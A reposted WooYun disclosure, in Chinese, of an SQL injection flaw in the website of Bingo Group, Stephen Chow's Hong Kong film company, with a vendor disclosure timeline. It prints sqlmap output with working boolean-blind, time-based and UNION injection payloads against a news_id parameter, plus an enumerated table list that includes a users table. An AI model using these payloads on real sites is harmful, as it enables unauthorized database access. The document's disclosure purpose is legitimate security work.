神刀安全网

漏洞标题: 周星驰《美人鱼》预热之出品方官网主站SQL注入漏洞(香港地區)

漏洞详情

披露状态:

2016-02-02: 细节已通知厂商并且等待厂商处理中
2016-02-04: 厂商已经确认,细节仅向厂商公开
2016-02-14: 细节向核心白帽子及相关领域专家公开
2016-02-24: 细节向普通白帽子公开
2016-03-05: 细节向实习白帽子公开
2016-03-18: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

比高集团,中国香港的电影公司,前身为帝通国际。2010年2月周星驰借壳帝通国际上市,将其从秘密的幕后推到了幕前,周星驰出任公司的执行董事,任期为5年,并于2010年5月27日正式更名为比高集团。上市后的比高集团将多元化发展,但主要的业务还是电影制作,周星驰表示在未来5年内将会推出10至20部电影,并在内地二三线城市开设多个电影院线。

详细说明:

周星驰《美人鱼》预热之出品方官网主站SQL注入漏洞

漏洞标题:  周星驰《美人鱼》预热之出品方官网主站SQL注入漏洞(香港地區)

漏洞标题:  周星驰《美人鱼》预热之出品方官网主站SQL注入漏洞(香港地區)

问题出现在周星驰这家电影公司的主站

code 区域
http://**.**.**.**/index2.php?section=news-and-events&news_id=10

漏洞标题:  周星驰《美人鱼》预热之出品方官网主站SQL注入漏洞(香港地區)

code 区域
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: news_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: section=news-and-events&news_id=10' AND 2561=2561 AND 'bUid'='bUid

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: section=news-and-events&news_id=10' AND (SELECT * FROM (SELECT(SLEEP(5)))NUqd) AND 'WBjC'='WBjC

Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: section=news-and-events&news_id=10' UNION ALL SELECT NULL,NULL,CONCAT(0x71787a7871,0x625a7443664246704367,0x716b6a6b71),NULL,NULL,NULL,NULL,NULL--
---
[19:35:59] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.12

code 区域
Database: bingo
[6 tables]
+---------------------------------------+
| announcement |
| announcement_bk |
| bingo_users |
| financial_releases |
| financial_releases_bk |
| newsnevent |
+---------------------------------------+

Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+

漏洞标题:  周星驰《美人鱼》预热之出品方官网主站SQL注入漏洞(香港地區)

漏洞证明:

已经证明

修复方案:

过滤 预处理

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 周星驰《美人鱼》预热之出品方官网主站SQL注入漏洞(香港地區)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址